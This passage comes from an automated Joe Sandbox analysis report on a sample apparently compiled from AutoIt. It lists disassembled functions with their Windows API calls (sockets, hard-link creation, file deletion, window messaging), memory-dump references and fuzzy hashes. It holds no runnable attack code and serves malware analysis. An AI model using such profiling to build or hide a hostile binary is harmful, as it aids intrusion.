                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageSend$DestroyWindow
                        • String ID: msctls_updown32
                        • API String ID: 4014797782-2298589950
                        • Opcode ID: 4c0f78bdb3309cd5fcff72934f109aba49dfa32b16535d8a05ae47266e540bed
                        • Instruction ID: c2bd2f74e5f24a735454fcdb17a6ed0e395db56061406bb69cda0b7fc0307cf2
                        • Opcode Fuzzy Hash: 4c0f78bdb3309cd5fcff72934f109aba49dfa32b16535d8a05ae47266e540bed
                        • Instruction Fuzzy Hash: D52160B5600208AFEB10DF68DCC1DB737ADEB8A7A4B040059FA109B391DB70EC52CB60
                        Function 009E95AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _wcslen
                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                        • API String ID: 176396367-2734436370
                        • Opcode ID: 958deb6b6eb73ef1a48c42f9dee6fde53336ce410e6c8c43e2aa4635b82dd7ab
                        • Instruction ID: 956497cf0d27fe1cd8626d45533d45077b7935f21e2437accee61d41f0f84280
                        • Opcode Fuzzy Hash: 958deb6b6eb73ef1a48c42f9dee6fde53336ce410e6c8c43e2aa4635b82dd7ab
                        • Instruction Fuzzy Hash: E9215E722046906AC732BB269C06FBBB3DCAFD1700F604826F9499B141EF55DD81C3D5
                        Function 00A137B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00A13840
                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00A13850
                        • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00A13876
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageSend$MoveWindow
                        • String ID: Listbox
                        • API String ID: 3315199576-2633736733
                        • Opcode ID: a3fb18e06e8b2f95a3a62ac3cf33da4d38a917e3d5299fa7595f659eeaa951c5
                        • Instruction ID: 5cfe5605ab8f6661e5b617e43b2472b96ee2b481e061aaf76e7080834996bff5
                        • Opcode Fuzzy Hash: a3fb18e06e8b2f95a3a62ac3cf33da4d38a917e3d5299fa7595f659eeaa951c5
                        • Instruction Fuzzy Hash: 5A217C72610218BBEF21DF95DC85FFB376EEF89760F108124F9149B190CA759C9287A0
                        Function 009F49F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 009F4A08
                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 009F4A5C
                        • SetErrorMode.KERNEL32(00000000,?,?,00A1CC08), ref: 009F4AD0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ErrorMode$InformationVolume
                        • String ID: %lu
                        • API String ID: 2507767853-685833217
                        • Opcode ID: 0c96f39c77774036a7716a7bec0546536907d3ee8cd632b8fccfa0ca1fcff42f
                        • Instruction ID: 0fa2738ee66bff6b9aad57af393c174662b09afa1e14dc21bac144490ee1b73f
                        • Opcode Fuzzy Hash: 0c96f39c77774036a7716a7bec0546536907d3ee8cd632b8fccfa0ca1fcff42f
                        • Instruction Fuzzy Hash: F5319174A40108AFDB10DF54C881EAABBF8EF48318F1480A8F909DB352D771ED46CB61
                        Function 00A141EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00A1424F
                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00A14264
                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00A14271
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID: msctls_trackbar32
                        • API String ID: 3850602802-1010561917
                        • Opcode ID: dba42f6e797ab44ccd07c8f6667f1e2994c11765382ab9a07296481e7c537da9
                        • Instruction ID: 0dc21b92f7a2f889ac08aaaf966469aefd1fa3cdc11bf160a86da93a47c442eb
                        • Opcode Fuzzy Hash: dba42f6e797ab44ccd07c8f6667f1e2994c11765382ab9a07296481e7c537da9
                        • Instruction Fuzzy Hash: E311C671240248BEEF209F69CC46FEB3BADEF99B64F110614FA55E6090D671DC919B10
                        Function 009E2F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00986B57: _wcslen.LIBCMT ref: 00986B6A
                          • Part of subcall function 009E2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 009E2DC5
                          • Part of subcall function 009E2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 009E2DD6
                          • Part of subcall function 009E2DA7: GetCurrentThreadId.KERNEL32 ref: 009E2DDD
                          • Part of subcall function 009E2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 009E2DE4
                        • GetFocus.USER32 ref: 009E2F78
                          • Part of subcall function 009E2DEE: GetParent.USER32(00000000), ref: 009E2DF9
                        • GetClassNameW.USER32(?,?,00000100), ref: 009E2FC3
                        • EnumChildWindows.USER32(?,009E303B), ref: 009E2FEB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                        • String ID: %s%d
                        • API String ID: 1272988791-1110647743
                        • Opcode ID: 1efef1108ad99c1266843477fb6af030a07806a0814f7486ebf88eb022c237d3
                        • Instruction ID: 6958de6f944338a4520055cae016ae33d1812f8e34d12d2848f94d8d7fdbd6e5
                        • Opcode Fuzzy Hash: 1efef1108ad99c1266843477fb6af030a07806a0814f7486ebf88eb022c237d3
                        • Instruction Fuzzy Hash: BE11A2756002456BCF15BF75DC89FEE376EAFD4314F048075BA099B292DE309E458B60
                        Function 00A15882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00A158C1
                        • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00A158EE
                        • DrawMenuBar.USER32(?), ref: 00A158FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Menu$InfoItem$Draw
                        • String ID: 0
                        • API String ID: 3227129158-4108050209
                        • Opcode ID: 700bbd53b5a45fef3ee98f8aeef3775029977f6ba9c773c62fd928477661ce8c
                        • Instruction ID: 2439c447083dd9a75b77827958fb9a03f93385a5b70262b4f01f8f9d9c989f08
                        • Opcode Fuzzy Hash: 700bbd53b5a45fef3ee98f8aeef3775029977f6ba9c773c62fd928477661ce8c
                        • Instruction Fuzzy Hash: F0016D35900218EFDB219FA5DC44BEEBBB9FB85360F10C099E849D6151DB308AC4DF21
                        Function 009DD3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 009DD3BF
                        • FreeLibrary.KERNEL32 ref: 009DD3E5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: AddressFreeLibraryProc
                        • String ID: GetSystemWow64DirectoryW$X64
                        • API String ID: 3013587201-2590602151
                        • Opcode ID: e34f5901813f14b4e72b702f297a8fad3b946990dbf415c1fc1fd374d6bd2703
                        • Instruction ID: 8bd7f3ba0bf4db69f9d166ee9b4907921b775124a107134f65b1c091590e3e6b
                        • Opcode Fuzzy Hash: e34f5901813f14b4e72b702f297a8fad3b946990dbf415c1fc1fd374d6bd2703
                        • Instruction Fuzzy Hash: 4EF055344C3610EBD7308A188C48DADB338BF00B11B64CA4BF126F6294E734CC84CB42
                        Function 009E007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 88e97fa0fab8b9460e25b362d0d4b6681f18563f72bb54c3470620b435eba6f1
                        • Instruction ID: d5a2ccddce0066ebf3b0f1e6687a21479abba3774c2a5201ef408edb15beacec
                        • Opcode Fuzzy Hash: 88e97fa0fab8b9460e25b362d0d4b6681f18563f72bb54c3470620b435eba6f1
                        • Instruction Fuzzy Hash: B1C16C75A0024AEFCB15CFA5C894BAEB7B9FF88304F208598E515EB251D771ED81CB90
                        Function 009B3E80 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: __alldvrm$_strrchr
                        • String ID:
                        • API String ID: 1036877536-0
                        • Opcode ID: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                        • Instruction ID: e248748538cebb7931629ca3b73a7081fcae61f609b08af9f11bc8e88ac28dca
                        • Opcode Fuzzy Hash: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                        • Instruction Fuzzy Hash: 52A15971D043869FEB11DF18CA917FEBBE9EF62360F14816DE5859B282C2388D41D751
                        Function 00A0342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Variant$ClearInitInitializeUninitialize
                        • String ID:
                        • API String ID: 1998397398-0
                        • Opcode ID: 007c485ed8f991b71bfec4f45825a3fb71da401821d9f25454591453fa4087f8
                        • Instruction ID: a9bed9e432dcf7d10fea4e081677c9748d6e40e9db41a091b2efaaa1d7bf5c1b
                        • Opcode Fuzzy Hash: 007c485ed8f991b71bfec4f45825a3fb71da401821d9f25454591453fa4087f8
                        • Instruction Fuzzy Hash: D5A14D766043049FCB00EF68D585A2AB7E9FF88714F14885DF99A9B3A2DB31ED01CB51
                        Function 009E0436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                        Download Yara Rule
                        APIs
                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00A1FC08,?), ref: 009E05F0
                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00A1FC08,?), ref: 009E0608
                        • CLSIDFromProgID.OLE32(?,?,00000000,00A1CC40,000000FF,?,00000000,00000800,00000000,?,00A1FC08,?), ref: 009E062D
                        • _memcmp.LIBVCRUNTIME ref: 009E064E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: FromProg$FreeTask_memcmp
                        • String ID:
                        • API String ID: 314563124-0
                        • Opcode ID: 9a083f149c432dc86124c6d39bd9cffa8957e776ee35f36999018b7428b834ff
                        • Instruction ID: 212c721a9a93d77edfcfd1f700471f8a677176b9707b80f7071bcb32659975a6
                        • Opcode Fuzzy Hash: 9a083f149c432dc86124c6d39bd9cffa8957e776ee35f36999018b7428b834ff
                        • Instruction Fuzzy Hash: 2F811771A00209EFCB05DF95C984EEEB7B9FF89315F204598F506AB250DB71AE46CB60
                        Function 009C1391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _free
                        • String ID:
                        • API String ID: 269201875-0
                        • Opcode ID: 9e0183e7649a3b8ba97ed154b2980affbd17f4a23f68b016c7d2be61e9033dec
                        • Instruction ID: 384267337d161fd93fa02441f863d4d03665561ad89a1185ef751fc5008f7396
                        • Opcode Fuzzy Hash: 9e0183e7649a3b8ba97ed154b2980affbd17f4a23f68b016c7d2be61e9033dec
                        • Instruction Fuzzy Hash: 94413E31D00510ABDB297BF98C45FFE3AA9EF83370F14462DF819D62A3E634484156A7
                        Function 00A16278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                        Download Yara Rule
                        APIs
                        • GetWindowRect.USER32(0136E908,?), ref: 00A162E2
                        • ScreenToClient.USER32(?,?), ref: 00A16315
                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00A16382
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$ClientMoveRectScreen
                        • String ID:
                        • API String ID: 3880355969-0
                        • Opcode ID: 508bd5b62da4d348c702fef18b27670bb949a92454080fcf97f1c70c7e191970
                        • Instruction ID: 49e63783771f26990e8c3ed65871c2205372f5d74ecec89f57505de3308f608d
                        • Opcode Fuzzy Hash: 508bd5b62da4d348c702fef18b27670bb949a92454080fcf97f1c70c7e191970
                        • Instruction Fuzzy Hash: 7651F974A00209EFDB10DF68D981AEE7BB6FB45360F108169F965DB2A0D770ED81CB50
                        Function 00A01AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                        Download Yara Rule
                        APIs
                        • socket.WSOCK32(00000002,00000002,00000011), ref: 00A01AFD
                        • WSAGetLastError.WSOCK32 ref: 00A01B0B
                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00A01B8A
                        • WSAGetLastError.WSOCK32 ref: 00A01B94
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ErrorLast$socket
                        • String ID:
                        • API String ID: 1881357543-0
                        • Opcode ID: b167f80638d4834c1ae9f55239b9734ab51a8ee60ff6319a73c1d066a161415f
                        • Instruction ID: bcb4029441fb70644131dbea6c08279850db8b2f347029dfe6eafe5186767d51
                        • Opcode Fuzzy Hash: b167f80638d4834c1ae9f55239b9734ab51a8ee60ff6319a73c1d066a161415f
                        • Instruction Fuzzy Hash: 7041C474640200AFE720AF24D886F6577E5AF85718F54C448FA1A9F7D2E772DD42CB90
                        Function 009BB41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 78420e15445c8599d7c52c055b46ecae91615ca223f1a1404bb6dcbb6e562829
                        • Instruction ID: ae40fa690e73edba48edabd81efcb54dfc3a0617675f4fc468893ea111d2adbc
                        • Opcode Fuzzy Hash: 78420e15445c8599d7c52c055b46ecae91615ca223f1a1404bb6dcbb6e562829
                        • Instruction Fuzzy Hash: 54413871A00704AFD7249F78CD41BAABBA9EBC9720F10452EF556DB2D2D7B199008780
                        Function 009F56D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 009F5783
                        • GetLastError.KERNEL32(?,00000000), ref: 009F57A9
                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 009F57CE
                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 009F57FA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CreateHardLink$DeleteErrorFileLast
                        • String ID:
                        • API String ID: 3321077145-0
                        • Opcode ID: a480ebee3385cb797b14305e0219bfdf15b86cf6525247f4cae2963772254e29
                        • Instruction ID: 1c9eca90d37a10d8b8e4b940e8f1e6b0e3f3ce3e355a34e5b81ff419d13eacbd
                        • Opcode Fuzzy Hash: a480ebee3385cb797b14305e0219bfdf15b86cf6525247f4cae2963772254e29
                        • Instruction Fuzzy Hash: 1D412939600610DFCB11EF55C444A5EBBE6AF89720B19C488F95AAB362CB34FD41CB91
                        Function 009BD8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                        Download Yara Rule
                        APIs
                        • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,009A6D71,00000000,00000000,009A82D9,?,009A82D9,?,00000001,009A6D71,8BE85006,00000001,009A82D9,009A82D9), ref: 009BD910
                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 009BD999
                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 009BD9AB
                        • __freea.LIBCMT ref: 009BD9B4
                          • Part of subcall function 009B3820: RtlAllocateHeap.NTDLL(00000000,?,00A51444,?,0099FDF5,?,?,0098A976,00000010,00A51440,009813FC,?,009813C6,?,00981129), ref: 009B3852
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
